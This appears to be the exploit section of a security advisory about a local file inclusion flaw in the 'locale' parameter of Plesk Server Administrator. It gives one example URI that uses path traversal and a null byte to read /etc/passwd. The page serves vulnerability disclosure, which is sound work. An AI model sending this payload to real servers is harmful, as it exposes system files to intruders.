• info
• discussion
• exploit
• solution
• references

Plesk Server Administrator (PSA) 'locale' Parameter Local File Include Vulnerability

Attackers can exploit this issue through a browser.

The following example URI is available:

https://www.example.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00